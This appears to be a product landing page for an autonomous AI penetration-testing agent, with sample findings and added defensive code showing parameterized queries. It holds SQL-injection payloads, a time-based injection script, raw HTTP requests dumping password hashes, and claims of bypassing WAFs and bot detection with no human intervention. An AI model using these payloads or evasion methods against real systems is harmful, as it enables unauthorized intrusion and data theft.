glitch@pentester:~$ ./scan --mode=autonomous --target
/\_/\
( ω)╌╌
> ◇<
/| |\
(_| |_)
~glitch~


An autonomous AI agent that runs a full pentest — recon, exploitation, reporting — while you sleep.

Works with the tools you trust

httpx · katana · ffuf · sqlmap · Nuclei · Burp Suite · OWASP ZAP · nmap · Metasploit · Nikto · subfinder · dirsearch

SQL Injection · XSS · SSRF · IDOR · JWT Attacks · Race Conditions · Business Logic · GraphQL · API Security · Auth Bypass
Live demo

Watch it hack a web app.

An AI agent that thinks, clicks, and exploits — just like a senior pentester. See every action in real time.


What makes it different

0 bot detections

Real Chrome browser

Controls a real Chrome session through a custom extension. Invisible to Cloudflare, DataDome, Akamai, and reCAPTCHA.

Cloudflare · DataDome · Akamai · reCAPTCHA

5 escalation levels

AI reasoning engine

The agent thinks before it acts — analyzing responses, planning multi-step attacks, and adapting when WAFs block payloads.

Context-aware · Adaptive · Multi-step

<1% false positive rate

Verified findings only

Every vulnerability is exploited and verified before reporting. No theoretical risks. No noise. Just real, proven bugs.

Verified PoC · Evidence · CVSS scored

4:32 average scan time

Minutes, not days

Full recon → exploitation → report in under 5 minutes. Parallel workers test 10+ endpoints simultaneously.

Parallel · Autonomous · CI/CD ready

That was 4 minutes. Imagine what it finds in your app.

Scan your app free →

Built different.

Not another wrapper around Nuclei. An autonomous agent that reasons, adapts, and finds bugs that automated scanners miss — with a cute face and sharp claws.

Zero Detection

Real Chrome browser.
Invisible to every WAF.

Controls a real Chrome session through a custom extension — not Puppeteer, not Selenium. Invisible to Cloudflare, DataDome, Akamai, and reCAPTCHA.

5 Escalation Levels

Thinks before it hacks.

Analyzes responses, plans multi-step attacks, and adapts when WAFs block payloads.

  • L1 Standard: known payloads
  • L2 WAF Bypass: encoding tricks
  • L3 Creative: custom payloads
  • L4 Deep: edge cases
  • L5 Chaining: multi-step
Multi-Agent System

4 agents. One mission.

Not one monolithic scanner — a team of specialized AI agents that coordinate, delegate, and verify each other's work.

  • Main Agent (MiniMax 2.5): drives the scan — recon, testing, exploitation
  • Triage Agent (MiniMax 2.5): ranks fuzz anomalies, filters noise
  • Specialist Agent (Opus 4.6): writes PoC exploits, verifies vulns
  • Extraction Agent (MiniMax 2.5): builds knowledge graph from traffic
🔑 Bring Your Own Key

Use your own API keys — Claude, GPT, Gemini, or any OpenAI-compatible endpoint. You control the model, the cost, and the data.

Specialist Agents

It writes the exploit. Runs it. Shows you the proof.

Frontier models write real Python PoCs, execute them live, and show you the output. You see the code, you see the result. Bye bye false positives.

Specialist: Claude Opus 4 (standby)

exploit_sqli.py (Python):

```python
import httpx

TARGET = "https://target.example"  # placeholder: base URL of the scan target

url = f"{TARGET}/api/users"
payloads = [
    "1' OR 1=1--",
    "1' UNION SELECT null,null--",
    "1; WAITFOR DELAY '0:0:5'--",
]
for p in payloads:
    r = httpx.get(url, params={"id": p})
    # httpx records the round-trip time on the response object
    elapsed = r.elapsed.total_seconds()
    if elapsed > 4.8:
        print(f"⚡ TIME-BASED SQLi: {elapsed:.1f}s")
```

OUTPUT:

```
$ python exploit_sqli.py
Testing 3 payloads against /api/users...
Payload 1: OR 1=1 → 200 OK (0.12s)
Payload 2: UNION SELECT → 500 Error (0.09s)
⚡ TIME-BASED SQLi CONFIRMED: 5.03s delay
✓ Blind SQL Injection — EXPLOITED
```
✓ Real code. Real execution. Zero false positives.
Auto-research

CVE Intelligence

Detects tech versions, auto-researches CVEs, tests exploits in background.

Background workers, zero latency
  • CRITICAL 9.8 · CVE-2022-22965 · Spring Boot 2.6.1 · Spring4Shell — RCE via ClassLoader · exploiting
  • CRITICAL 9.8 · CVE-2022-22963 · Spring Cloud · SpEL injection via routing · confirmed
  • HIGH 7.5 · CVE-2021-42340 · Tomcat 9.0.54 · DoS via incomplete upload · tested
Severity escalation

Attack Chain Engine

Chains low-severity findings into critical exploits. Two Lows become one Critical.

Low + Low = Critical

  • LOW: Open Redirect (/oauth/callback)
  • LOW: Token in URL (/api/auth)
  • MEDIUM: No token rotation (/api/sessions)

CRITICAL 9.1: Account Takeover
  • Step 1: Open Redirect
  • Step 2: Token in URL
  • Step 3: No token rotation
✓ CHAIN VERIFIED
SmartEndpoints

Persistent Memory

SmartEndpoints track every URL, parameter, and response variation across 2,000+ iterations.

Survives context window trimming
  • GET /api/users/{id} · 2
  • POST /api/auth/login
  • PUT /api/users/{id} · 1
  • DELETE /api/sessions
47 SmartEndpoints

GET /api/users/{id} · 🔒 bearer · 23 reqs

Parameters: id (int, path, required) · fields (string, query) · include (string, query)
Response Variations: 200 User object ×14 · 403 Forbidden ×3 · 404 Not found ×1
Security Notes: Sequential IDs — predictable · PII in response (email, phone) · No rate limiting on enumeration
Vuln Indicators: IDOR (id, high) · Enum (id, medium)
Response Schema: { id, email, phone, role, created_at }
Tests: IDOR, SQLi, XSS · BOLA on role field, Enum user IDs
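To make the SmartEndpoint idea concrete, here is an added example in Python (it is not glitch's code, which the page does not show): a hypothetical EndpointMemory tracker that folds raw request/response pairs into one record per method and path template, counts response variations, collects query parameter names, and derives the two security notes that traffic alone can support, sequential resource ids and PII keys in response bodies. The traffic, field names and PII list are constructed for the example; the rate-limiting note needs timing data and is deliberately not attempted.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

NUMERIC_SEGMENT = re.compile(r"^\d+$")
PII_FIELDS = {"email", "phone", "ssn", "address"}  # assumed PII key names


@dataclass
class SmartEndpoint:
    """Per-endpoint memory: one record per (method, path template)."""
    method: str
    template: str
    requests: int = 0
    path_ids: list = field(default_factory=list)            # numeric path values seen
    query_params: set = field(default_factory=set)          # query parameter names
    status_counts: Counter = field(default_factory=Counter)  # response variations
    response_keys: set = field(default_factory=set)         # keys of 2xx JSON bodies

    def notes(self) -> list:
        """Security notes derivable from the recorded traffic alone."""
        notes = []
        ids = sorted(set(self.path_ids))
        # Three or more ids with no gaps: the resource id is a plain counter.
        if len(ids) >= 3 and all(b - a == 1 for a, b in zip(ids, ids[1:])):
            notes.append("Sequential IDs (predictable)")
        pii = sorted(self.response_keys & PII_FIELDS)
        if pii:
            notes.append(f"PII in response ({', '.join(pii)})")
        return notes


def normalize(url_path: str):
    """'/api/users/12?fields=email' -> ('/api/users/{id}', [12], {'fields'})."""
    path, _, query = url_path.partition("?")
    ids, segments = [], []
    for seg in path.split("/"):
        if NUMERIC_SEGMENT.match(seg):
            ids.append(int(seg))
            segments.append("{id}")
        else:
            segments.append(seg)
    params = {kv.split("=", 1)[0] for kv in query.split("&") if kv}
    return "/".join(segments), ids, params


class EndpointMemory:
    """Collapses raw request/response pairs into SmartEndpoint records."""

    def __init__(self):
        self.endpoints = {}

    def record(self, method: str, url_path: str, status: int,
               body: Optional[dict]) -> SmartEndpoint:
        template, ids, params = normalize(url_path)
        key = (method, template)
        ep = self.endpoints.setdefault(key, SmartEndpoint(method, template))
        ep.requests += 1
        ep.path_ids.extend(ids)
        ep.query_params |= params
        ep.status_counts[status] += 1
        # Only successful responses describe the resource's schema.
        if 200 <= status < 300 and isinstance(body, dict):
            ep.response_keys |= set(body)
        return ep


# Constructed sample traffic (not captured from any real application).
SAMPLE_TRAFFIC = [
    ("GET", "/api/users/1?fields=email", 200,
     {"id": 1, "email": "a@example.test", "phone": "555-0100", "role": "user"}),
    ("GET", "/api/users/2", 200,
     {"id": 2, "email": "b@example.test", "phone": "555-0101", "role": "user"}),
    ("GET", "/api/users/3", 403, {"error": "forbidden"}),
    ("GET", "/api/users/4?include=sessions", 404, {"error": "not found"}),
    ("POST", "/api/auth/login", 200, {"token": "constructed-token"}),
]


def build_memory(traffic=SAMPLE_TRAFFIC) -> EndpointMemory:
    mem = EndpointMemory()
    for method, url_path, status, body in traffic:
        mem.record(method, url_path, status, body)
    return mem


if __name__ == "__main__":
    for (method, template), ep in build_memory().endpoints.items():
        variations = ", ".join(f"{s} x{n}" for s, n in sorted(ep.status_counts.items()))
        print(f"{method} {template}: {ep.requests} reqs; params={sorted(ep.query_params)}; "
              f"variations={variations}; notes={ep.notes()}")
```

The same aggregation run over your own access logs gives an API inventory and surfaces id-enumeration patterns before a scanner does, which is the defensive use of this structure.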
OOB Callbacks

Blind Vuln Detection

OOB callback server catches blind SSRF, XSS, SQLi. Payloads phone home — even when responses look clean.

Detects what scanners miss
  • ① INJECT: POST /api/users with body {"email":"{{OOB}}"}
  • ② TARGET: 200 OK — looks clean; ⚠ outbound DNS resolve
  • ③ OOB SERVER: DNS Callback · HTTP Callback
⚡ BLIND SSRF CONFIRMED · 2 callbacks · 340ms

Supported vulnerability types

SQL Injection · XSS · SSRF · IDOR · JWT Attacks · Race Conditions · Business Logic · GraphQL · API Security · Auth Bypass · CORS · XXE · Open Redirect · File Upload · Command Injection · Path Traversal

How it works

Five autonomous phases. Zero human intervention.

Phase 01: Reconnaissance

Sees everything. Before it tests anything.

127 endpoints mapped

The agent crawls every route in your SPA, reads your JavaScript bundles to find API paths the browser never visits, and fingerprints your entire stack down to the patch version. It logs in, maps every role, and builds a complete picture of your attack surface — endpoints,...

  • Reads JavaScript source: finds hidden API routes, hardcoded secrets, and internal endpoints buried in production bundles
  • Fingerprints everything: framework, version, middleware, database, cloud provider, down to the patch level
  • Discovers what's exposed: REST APIs, GraphQL schemas, health checks, admin panels, forgotten debug endpoints
  • Maps authentication: login flows, JWT structure, OAuth providers, session handling, role hierarchies

Client-ready reports

Reports your clients will actually read

No email gate. No "request a demo." This is what every scan produces.

glitch. Security Assessment

Target: acme-webapp.com | February 2026 | 47 endpoints tested
2 Critical · 3 High · 4 Medium · 1 Low

Executive Summary

Automated assessment identified 10 vulnerabilities across 47 endpoints. 2 critical findings require immediate remediation — a SQL injection in the user API enables full database extraction, and a payment bypass allows orders without payment.

Findings

Severity · Finding · CVSS · Status
CRITICAL · SQL Injection — /api/v2/users · 9.8 · Exploited

The `id` parameter in the user lookup endpoint is directly concatenated into a SQL query without parameterization. An attacker can extract the entire database contents including password hashes, PII, and API keys.

Evidence:

```
$ curl 'https://acme-webapp.com/api/v2/users?id=1%27%20OR%20%271%27=%271'
HTTP/1.1 200 OK
Content-Type: application/json
{"users":[{"id":1,"email":"admin@acme.app","role":"admin"},
{"id":2,"email":"jane@acme.app","role":"user"},
... 3,410 more rows ]
```
Remediation

Use parameterized queries or an ORM. Replace raw SQL string concatenation in UserController.getById() with prepared statements.

CWE-89: SQL Injection

CRITICAL · Payment Bypass — checkout flow · 9.1 · Confirmed
HIGH · JWT Algorithm Confusion · 8.1 · Exploited
HIGH · Race Condition — coupon abuse · 7.5 · Confirmed
MEDIUM · Missing CSP Header · 5.3 · Detected

Every scan generates a client-ready report. Export as JSON, SARIF, or view in the dashboard.

Run your first scan →

Zero Findings = Zero Cost

If we don't find anything, you don't pay. Guaranteed.

Arsenal

Your entire security toolkit.
One agent.

glitch orchestrates 20+ industry-standard tools alongside its own AI-powered analysis. Every tool runs in terminal, every result feeds back into the agent's reasoning.

Nuclei

Template-based vulnerability scanner with 8000+ community templates

ffuf

Lightning-fast web fuzzer for directory and parameter discovery

nmap

Network discovery and security auditing

OWASP ZAP

Web app security scanner with active/passive modes

sqlmap

Automatic SQL injection detection and exploitation

Nikto

Web server vulnerability scanner

httpx

Fast HTTP toolkit for probing and fingerprinting

subfinder

Subdomain discovery and enumeration

katana

Next-gen web crawling and spidering framework

dirsearch

Web path discovery brute-forcer

Burp Suite

Intercepting proxy for manual testing

Metasploit

Penetration testing framework

Plus your own

Any tool that runs in a terminal, glitch can use. Write a shell command, the agent executes it.

terminal
```
$ glitch scan https://target.com --tools nuclei,ffuf,sqlmap
$ glitch create tool my_tool
```

Built on open source

  • OWASP: OWASP Foundation
  • ProjectDiscovery: Nuclei · httpx · subfinder
  • PortSwigger: Burp Suite
  • Rapid7: Metasploit Framework

Real results

What glitch. actually finds 🎯

Real findings from real scans. Click any finding to see the full report — proof-of-concept, evidence, and remediation steps included.

+ 7 more findings in full report
#1 · Critical · SQL Injection · 🔗 Full Account Takeover · CVSS 9.8

Blind SQL Injection via User ID Parameter

Location

GET /api/v2/users?id=

Description

The id parameter in the user lookup endpoint is vulnerable to time-based blind SQL injection. The application directly interpolates user input into a SQL query without parameterization, allowing an attacker to extract the entire database contents including password hashes and PII.

Evidence

```
GET /api/v2/users?id=1' OR '1'='1'-- HTTP/1.1
Host: acme-corp.com

HTTP/1.1 200 OK
Content-Length: 847291
```

→ 3,412 rows returned (expected: 1)
→ Entire users table exfiltrated incl. bcrypt hashes

Raw HTTP

REQUEST

```
GET /api/v2/users?id=1' OR '1'='1'-- HTTP/1.1
Host: acme-corp.com
Cookie: session=eyJhbGciOi...
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64)
```

RESPONSE

```
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 847291

[{"id":1,"email":"admin@acme.app","password_hash":"$2b$10$kR8..."},
 {"id":2,"email":"jane@acme.app","password_hash":"$2b$10$mQ4..."},
 ... 3,410 more rows]
```

Steps to Reproduce

  1. Send GET /api/v2/users?id=1 — observe normal 1-row response
  2. Send GET /api/v2/users?id=1' OR '1'='1'-- — observe full table dump
  3. Confirm time-based: id=1'; WAITFOR DELAY '0:0:5'-- → 5.03s response
  4. Extract admin credentials: admin@acme.app / $2b$10$...

Impact

Full database read access. Attacker can exfiltrate all user records including password hashes, PII, and session tokens.

Recommendation

Use parameterized queries or prepared statements. Never concatenate user input into SQL strings.
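A worked illustration of this recommendation (and of the report's earlier remediation note for `UserController.getById()`), added here as an example rather than code from glitch. or from the assessed application: a hypothetical Python/SQLite stand-in for the user lookup, first as the report describes it (string concatenation), then with a bound parameter, then with input validation on top. The user rows are constructed; the injection string is the one from the report's evidence.

```python
import sqlite3

# Constructed sample data (not the assessed application's database).
SAMPLE_USERS = [
    (1, "admin@example.test", "admin"),
    (2, "jane@example.test", "user"),
    (3, "bob@example.test", "user"),
]

# The injection string shown in the report's evidence.
INJECTION = "1' OR '1'='1'--"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite table standing in for the users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def get_by_id_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Hypothetical getById() as the report describes it: the parameter is
    concatenated into the SQL text, so a quote in the input ends the string
    literal and the rest of the input is parsed as SQL."""
    sql = "SELECT id, email, role FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def get_by_id_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Remediated version: a prepared statement with a bound parameter.
    The value travels separately from the SQL text, so it is only ever
    compared as data and never parsed as SQL."""
    sql = "SELECT id, email, role FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def get_by_id_strict(conn: sqlite3.Connection, user_id: str) -> list:
    """Defence in depth: validate the type before the query runs, so a
    malformed id is rejected at the edge instead of reaching the database."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, email, role FROM users WHERE id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def demo() -> dict:
    """Row counts each variant returns for a normal id and for the injection."""
    conn = make_db()
    result = {
        "vulnerable_normal": len(get_by_id_vulnerable(conn, "1")),
        "vulnerable_injected": len(get_by_id_vulnerable(conn, INJECTION)),
        "safe_normal": len(get_by_id_safe(conn, "1")),
        "safe_injected": len(get_by_id_safe(conn, INJECTION)),
        "strict_normal": len(get_by_id_strict(conn, "1")),
    }
    try:
        get_by_id_strict(conn, INJECTION)
        result["strict_injected"] = "accepted"
    except ValueError:
        result["strict_injected"] = "rejected"
    return result


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

With the concatenated query the injected id turns `WHERE id = '1'` into `WHERE id = '1' OR '1'='1'` (the trailing `--` comments out the closing quote) and every row comes back; with the bound parameter the same string is compared against the integer column as a literal value and matches nothing; the strict variant never reaches the database at all.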

References

CWE-89 · OWASP A03:2021 · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

How we compare

glitch. vs. the rest

Features compared (glitch. vs. Aikido, Burp Suite, OWASP ZAP):

  • Autonomous scanning
  • Business logic testing
  • Attack chain detection
  • AI reasoning engine
  • CLI + self-hosted option
  • 20+ tool orchestration
  • Autonomous browser control
  • Undetectable by bot detectors
  • SARIF / CI/CD output
  • Whitebox + blackbox testing
  • Zero config setup
  • Free tier available

Feature comparison based on default product capabilities. Some tools may support features via plugins.

A single manual pentest costs $10,000–$50,000.

Unlimited scans. A fraction of the cost.


Free

For individual developers.

$0/mo
  • 3 scans / month
  • 1 concurrent scan
  • JSON export
  • Community support
Get started
Most Popular

Pro

For security engineers.

$99/mo
  • 50 scans / month
  • 3 concurrent scans
  • SARIF + JSON export
  • Attack chain detection
  • Email alerts
  • Priority support
Start free trial

Team

For security teams.

$299/mo
  • 200 scans / month
  • 10 concurrent scans
  • CI/CD integration
  • Slack notifications
  • Scan diffing
  • Team management
Start free trial

Enterprise

For organizations.

Custom
  • Unlimited scans
  • Self-hosted option
  • SSO / SAML
  • SLA guarantee
  • Dedicated CSM
  • Custom integrations
Contact sales

14-day free trial. No credit card required.


$ glitch scan https://target.com

Start scanning.

No credit card. No config. Just paste your URL and get results in minutes.

No credit card required
3 free scans on signup
Results in under 5 minutes